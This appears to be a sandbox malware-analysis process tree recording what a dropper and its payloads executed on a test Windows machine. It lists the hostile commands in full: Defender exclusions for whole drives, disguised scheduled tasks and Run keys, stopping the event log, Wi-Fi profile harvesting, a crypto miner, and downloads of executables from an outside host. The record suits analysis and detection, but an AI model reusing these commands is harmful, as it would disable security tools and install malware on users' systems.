PID:1732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5584

C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe"
5⤵
- Executes dropped EXE
PID:1680

C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:6004

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:6108

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
3⤵
PID:5248

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:4568

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:540

C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
4⤵
PID:1304

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
3⤵
PID:4488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"
3⤵
PID:1276

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:4732

C:\Windows\system32\timeout.exe
timeout /t 3
4⤵
- Delays execution with timeout.exe
PID:4364

C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1592

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
3⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1440
3⤵
- Program crash
PID:5596

C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5288

C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:3052

C:\Users\Admin\AppData\Local\Temp\Files\lada.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4980

C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe"
2⤵
- Executes dropped EXE
PID:4644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "ACULXOBT"
3⤵
- Launches sc.exe
PID:5616

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"
3⤵
- Launches sc.exe
PID:5972

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1652

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "ACULXOBT"
3⤵
- Launches sc.exe
PID:5576

C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"
2⤵
- Executes dropped EXE
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 7300
3⤵
- Program crash
PID:848

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5788

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
3⤵
- Executes dropped EXE
PID:5808

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:1932

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1016

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
6⤵
- Executes dropped EXE
PID:380

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:5448

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
8⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5328

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
9⤵
PID:4280

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
10⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1652

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:5900

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
12⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3684

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:5376

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
14⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1456

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:2628

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
16⤵
- Drops file in Windows directory
PID:5524

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
17⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:4444

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
18⤵
- Drops file in Windows directory
PID:1860

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
19⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:5732

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
20⤵
- Drops file in Windows directory
PID:4380

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
21⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:4816

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
22⤵
- Drops file in Windows directory
PID:2204

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
23⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:5132

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
24⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:4280

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
25⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
PID:4252

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
26⤵
- Drops file in Windows directory
PID:5204

C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
27⤵
- Drops file in Windows directory
PID:1324

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2912

C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE
C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5576

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
4⤵
- Blocklisted process makes network request
PID:1464

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\Temp\tel.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3692

C:\Windows\Temp\tel.exe
C:\Windows\Temp\tel.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5168

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 156
6⤵
- Program crash
PID:1804

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\Temp\fcc.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2252

C:\Windows\Temp\fcc.exe
C:\Windows\Temp\fcc.exe
5⤵
- Executes dropped EXE
PID:5968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
6⤵
PID:1916

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\Temp\jjj.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2784

C:\Windows\Temp\jjj.exe
C:\Windows\Temp\jjj.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:2612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 240
6⤵
- Program crash
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1332 -ip 1332
1⤵
PID:3548

C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
1⤵
PID:3120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6bOuYaabJ9.bat"
2⤵
PID:5380

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:5816

C:\DriverHostCrtNet\4363463463464363463463463.exe
"C:\DriverHostCrtNet\4363463463464363463463463.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae9414f3-5cc8-4ee3-b156-8e00e0d505c5.vbs"
4⤵
PID:5188

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5feb41f3-71ea-4ee5-8080-cc28895b2a1d.vbs"
4⤵
PID:3176

C:\DriverHostCrtNet\4363463463464363463463463.exe
C:\DriverHostCrtNet\4363463463464363463463463.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
2⤵
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\odt\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4960 -ip 4960
1⤵
PID:664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1724

C:\Windows\SysWOW64\SCHTASKS.exe
SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
1⤵
- Creates scheduled task(s)
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\odt\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriverHostCrtNet\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "networan" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "networan" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Users\Admin\AppData\Local\Temp\Files\Users.exe
users.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
PID:4068

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe
4⤵
- Executes dropped EXE
PID:396

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 6
4⤵
- Runs ping.exe
PID:3888

C:\Windows\SysWOW64\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f
4⤵
PID:1012

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ipz.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5804

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ipz2.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5836

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im safesurf.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im surfguard.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5300

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe
4⤵
- Executes dropped EXE
PID:2888

C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
4⤵
- Modifies registry key
PID:5892

C:\Windows\SysWOW64\reg.exe
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
4⤵
- Modifies registry key
PID:5560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nvidsrv.exe
4⤵
- Kills process with taskkill
PID:3120

C:\Windows\SysWOW64\reg.exe
reg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f
4⤵
PID:4428

C:\Windows\SysWOW64\find.exe
find "svr.vbs"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Windows\SysWOW64\reg.exe
REG QUERY hkcu\software\microsoft\windows\currentversion
4⤵
- Modifies registry key
PID:5828

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f
4⤵
- Adds Run key to start application
PID:5640

C:\Windows\SysWOW64\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\run" /v "winsvcr" /t reg_sz /d "C:\Users\Admin\AppData\Roaming\Macromedia\svr.vbs" /f
4⤵
- Adds Run key to start application
PID:5980

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/raauser.exe
4⤵
- Executes dropped EXE
PID:1052

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Macromedia\nobuf.vbs"
4⤵
- Checks computer location settings
PID:2476

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/amsql.exe
4⤵
- Executes dropped EXE
PID:5900

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/prochack.exe
4⤵
- Executes dropped EXE
PID:5880

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 20
4⤵
- Runs ping.exe
PID:5340

C:\Windows\SysWOW64\reg.exe
reg delete HKCU\SOFTWARE\JetSwap /f
4⤵
- Modifies registry key
PID:5984

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
2⤵
- Runs ping.exe
PID:2832

C:\Windows\SysWOW64\explorer.exe
explorer.exe C:\Users\Admin\AppData\Roaming\Macromedia
2⤵
PID:4920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "networa" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1724

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 1
1⤵
- Runs ping.exe
PID:2536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\first.exe'
1⤵
PID:4244

C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exe
wmild.exe -c http://duserifram.toshibanetcam.com/app.exe
1⤵
- Executes dropped EXE
PID:244

C:\Windows\SysWOW64\chcp.com
CHCP 1251
1⤵
PID:4188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\odt\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\DriverHostCrtNet\dwm.exe'" /rl HIGHEST /f
